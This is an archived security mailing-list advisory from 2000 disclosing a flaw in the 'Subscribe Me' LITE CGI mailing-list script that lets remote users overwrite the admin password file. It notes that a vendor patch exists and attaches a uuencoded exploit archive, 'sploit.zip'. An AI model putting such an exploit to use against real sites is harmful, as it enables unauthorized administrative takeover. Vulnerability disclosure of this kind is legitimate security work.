OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Subscribe Me Vulnerability
From: n30 (n30ALLDAS.DE)
Date: Wed Aug 23 2000 - 21:06:29 CDT


Product: Subscribe Me
Versions: ALL version numbers LITE only
OS: Unix and Winnt
Vendor: Notified, http://www.cgiscriptcenter.com/

The Problem:

    Yet again the script allows a remote user to overwrite the Admin Passwd file with
any password they see fit. Therefore giving them Admin access to the Maillist Script

Exploit:

    See the .zip file Attached

Patches:

    Already Available see website, download version is patched.

n30
n30alldas.de
www.alldas.de

begin 666 sploit.zip
M4$L#!!0```(`%!T%RDZ3)<F,P(``/<%```,````17AP;&]I="YH=&ULK53;
M;IM $'VOU'\8;5\30],^68"*[;6-9"Z"=:ST;0WK>B5$:SCYN^SZP#!;M*F
MDI% S&AN9\[,6'M9Y,[G3]8\C'UPI\0+`QOMI:S&AG$\'D?I+]ZD-:]DRDK)
MZE$J"D/I;K>\-)K#MJI%QJA?[79EHVJ'(&/R3*<V2*$X)4=%"/-<4!P;%C
M3>).0]S)"L,DC&<XMI&)8./-R-)&WTVS\])6DW#V,!#C_E]+LX$TT$<JCZ-
M!03F[A3;Z)'5&2WI#=":T_P&]BQ_9)*G%+5FTW 5JBJ^S.>FJ?,G':+7J `^
MY5'L&5H%P<22>6A&8.;%;R$B#;-4=09)$S"_2$O64VW/.?R"?#O*A=<MGZ6
MH6HSHB&.KCG_4?%EP>4WLX_?ACMOR"EVXOU4L6^_HG]GB7)&&P8GWD'N&01X
M,X ZAE&?[RTL0Y8NB':&/;T^$^26Z+!77D+-9RQMUBJJ;*\(%H3( ^10A&Y
M2;)1X1$$KJ_DZII"^-L.KIY.>O#W0?Z4+6\]FOPBI%?/7R[ZY7?RK*':\+
M*KDHKX/AA6$TV.7>: K64]\CW2&B8U+7#OKM9*A-.:]#L#[^/]>Y(8)[C/
M=Y!ICX70Z8T>BA?=^7,\0VGSN%T*P/RTO^/K)$^1 H"$ %KM4Z^R/CN"1)Q
MJ%.FE9'I00I8'A#091 W'B!%=.L5M%!QSB]%/8UV]FHH#R78JS6_?-\XPV
MHXPA1VMO"V89= A-7W==N=&>^V=02P$"% `4``(`" !0=!<I.DR7)C,"``#W
M!0``# `````````!`" `MH$`````17AP;&]I="YH=&UL4$L%!`````!``$`
*.```%T"````````
`
end